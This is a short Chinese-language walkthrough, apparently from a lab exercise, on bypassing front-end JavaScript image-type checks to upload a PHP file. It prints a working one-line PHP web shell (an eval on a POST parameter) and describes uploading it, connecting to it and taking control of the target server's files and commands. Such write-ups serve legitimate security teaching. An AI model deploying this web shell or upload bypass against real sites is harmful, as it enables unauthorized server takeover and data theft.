(1)用前端js代码写的文件格式验证,上传时检测文件类型是否为图片类型jpg,png,gif,如果不是图片类型文件,不给上传。
我们看到,正常的上传,不是图片jpg,png,gif文件是不给上传的。
(2)确定原因,寻找思路,只要停止JS代码运行就可以绕过文件验证,可以浏览器禁止,可以在源码中入手。
我们开始尝试绕过文件验证,给服务器上传一段一句话的PHP木马,已达到控制目标服务器的目的。
一句话php木马代码如下:
<?php @eval($_POST['aaaaaa']);?>
(3)准备好php木马后,我们开始上传木马。从返回的http状态码为200的时候,正常是成功了,这里我只能说,有可能成功哈哈。
(4) 往下看,看到了上传路径,再次群定,确实上传成功了。
(5)成功的把PHP一句话木马上传到了目标服务器的upload文件夹。接下来,尝试连接PHP文件,控制目标服务器。
连接木马成功。
(6)已经成功控制目标服务器。可进行目标服务器的文件查看,文件删除,文件下载,等各种操作,执行windows高级的shell命令。